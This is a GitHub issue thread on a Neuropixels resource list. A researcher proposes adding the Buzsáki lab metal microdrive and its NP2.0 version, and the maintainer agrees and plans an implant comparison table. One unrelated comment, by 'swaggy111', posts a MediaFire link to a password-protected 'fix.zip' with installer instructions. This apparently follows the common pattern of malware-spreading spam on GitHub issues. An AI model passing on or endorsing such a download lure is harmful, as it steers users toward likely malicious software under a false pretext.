### ISSUE TITLE
Recoverable implants: One more :) 

### ISSUE THREAD

**Issue by anemri** [Julie-Fabre/awesome-neuropixels#5]
Hello, I wanted to bring to your attention the metal microdrive developed by the Buzsáki lab. We have collaborated with them on manufacturing and distribution, and it has now been used by 80 labs. Several of those labs use the microdrive with Neuropixels probes, as it makes it very easy to recover and reuse probes.    

Github link: https://buzsakilab.github.io/3d_print_designs/microdrives/microdrives/
Paper link: https://elifesciences.org/articles/65859 

We also recently released a modified version of the metal drive specific for use with NP2.0 probes with dovetail caps. Like the original version of the microdrive, it is open source. 

Github link: https://github.com/3Dneuro/R2np 

I hope this is of interest
Kind regards,
Abdel

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Julie-Fabre** [comment]
Hi Abdel,

Thanks for bringing this to my attention! It's now been added to the list as the "Vöröslakos et al. microdrive implant, Buzsáki lab"-- let me know if that looks good to you.

There are many implants out there now, which is fantastic, but it's making this section a bit tricky to navigate. I'm planning to add a table in the next few days that'll list each implant along with some key features and characteristics (like compatible species, probe types, that kind of stuff). It should make it easier for everyone to compare and find what they need. I might give you a shout if I need any extra info on the metal microdrive or the NP2.0 version when I'm putting that together.

**Comment by anemri** [comment]
Hi Julie, looks great, thanks! The idea of a table sounds good, happy to help in any way I can.

**Comment by Julie-Fabre** [comment]
Great! I haven't had time for it yet, but I've enlisted Célian Bimbard's (of the Apollo chronic implant) to help create it. We'll probably check in in a few weeks time. Thanks again!
